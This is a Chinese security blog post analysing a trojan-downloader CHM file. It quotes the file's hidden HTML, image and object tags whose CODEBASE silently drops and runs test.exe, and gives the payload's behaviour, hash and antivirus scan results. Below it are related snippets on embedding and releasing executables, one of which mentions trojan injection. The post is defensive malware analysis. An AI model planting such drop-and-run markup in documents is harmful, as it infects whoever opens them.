[06-20] 一个释放/运行EXE文件的CHM文件 Trojan.DL.Inject.fg(TrojanDownloader.Small.mp)(第3版)

原创 2006年06月18日 22:58:00

endurer 原创

2006-06-20 第3版 补充:瑞星18.32.10将test.exe报为Trojan.DL.Inject.fg
2006-06-19 第2版 补充:江民KV将test.exe报为TrojanDownloader.Small.mp
2006-06-18 第1

一位网发来的cHM文件中有代码:

 


 

<body onselectstart="return false"; onpaste="return false";>
<img src="test.exe" width=0 height=0>
<img src="001.jpg">
<object id="RUNIT" WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject" CODEBASE="test.exe">
</object>

 


 

因此打开此CHM文件会释放/运行一个名为test.exe的文件。

test.exe用Microsoft Visual C++ 编写,经UPX压缩,会用线程插入explorer.exe,试图访问:hxxp://gd.vnet.cn


File: test.exe
Status: POSSIBLY INFECTED/MALWARE (Note: this file was only flagged as malware by heuristic detection(s). This might be a false positive. Therefore, results of this scan will not be stored in the database)
MD5 1d0b29b416ebe8e942173a326eb6e1ed
Packers detected: UPX
Scanner results
AntiVir Found Heuristic/Hijacker (probable variant)
ArcaVir Found nothing
Avast Found nothing
AVG Antivirus Found nothing
BitDefender Found nothing
ClamAV Found nothing
Dr.Web Found nothing
F-Prot Antivirus Found nothing
Fortinet Found nothing
Kaspersky Anti-Virus Found nothing
NOD32 Found nothing
Norman Virus Control Found nothing
UNA Found nothing
VirusBuster Found nothing
VBA32 Found nothing

在exe文件中嵌入文件并释放

以前有不少文章也是关于这个问题的,不过这些老文章里讲述的方法通常让你需要做较多的工作,而其实并不需要这么工作,因为在Delphi5中的更加简便的方法。首先,我想给你介绍一下Delphi5自带的一个演示...
  • Vsun
  • Vsun
  • 2005年04月14日 13:49
  • 1595

Dll释放可执行文件

Dll释放可执行文件用途很广泛。一种实现木马注入的方法就是将dll加载到某进程的地址空间后释放木马。接下来 介绍下详细的步骤,为后来者提供参考。      需要释放的文件首先必须以资源的形...
  • ithzhang
  • ithzhang
  • 2012年09月19日 14:24
  • 3445

在exe文件中包含exe文件并释放的方法

Purebasic的data果然强大,省去操作rc文件的许多麻烦。 代码如下: s.s = PeekS(?text) OpenFile(0,"qq.txt") WriteStringN(0,s) ...
  • dongnanyanhai
  • dongnanyanhai
  • 2010年11月08日 10:12
  • 891

c# 释放文件

byte[] buffer = Properties.Resources.UpdatePSEC;//这个是添加EXE到程序资源时的名称FileStream FS = new FileStream(Ap...
  • dieindark
  • dieindark
  • 2010年03月05日 23:27
  • 3400

Win10打不开chm文件的解决办法

在Win10系统中打开chm文件时,提示安全警告,如下图:   点击打开后,可以看到chm文件的目录大纲,但是点击任意目录其内容都是空白,如下图:   经过网络一通搜索,发现解决办法很简单,就...
  • xiamiaogogogo
  • xiamiaogogogo
  • 2017年11月17日 15:27
  • 199

VC 从资源中释放文件

将文件放入资源中,然后在程序运行的过程中释放出来,下面是代码: BOOL FreeResFile(HINSTANCE hInstance, DWORD dwResName, LPCWSTR lpRe...
  • water12233
  • water12233
  • 2016年09月21日 15:51
  • 388

cmd下如何运行.exe文件

cmd下如何运行.exe文件 2011-09-08 00:53 提问者: tsinghua821 |浏览次数:3403次 问题补充: 我有个wis.exe的文件你们这些方法都用过可还是...
  • yuanyuan_186
  • yuanyuan_186
  • 2013年02月02日 18:00
  • 7443

将EXE作为资源,然后在释放到磁盘上并运行该exe程序

// 将exe作为资源加入,然后再释放出来,并运行 try { HRSRC hRes = FindResource(NULL, MAKEINTRESOURCE(IDR_E...
  • VisualEleven
  • VisualEleven
  • 2010年11月25日 17:02
  • 7322

【EXE PE】初识pe结构--手写可执行程序

原文地址http://bbs.pediy.com/showthread.php?t=48590 【文章标题】: 手写可执行程序 【文章作者】: dncwbc 【作者邮箱】: dnc2588@...
  • zfpigpig
  • zfpigpig
  • 2013年09月06日 11:12
  • 4550

如何在Ubuntu安装EXE文件

http://blog.163.com/yuanwangshu_321/blog/static/3250107120091101410935 转载原文部分 下载及安装   若你使用 De...
  • lijia11080117
  • lijia11080117
  • 2016年09月04日 17:16
  • 4889
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:[06-20] 一个释放/运行EXE文件的CHM文件 Trojan.DL.Inject.fg(TrojanDownloader.Small.mp)(第3版)
举报原因:
原因补充:

(最多只允许输入30个字)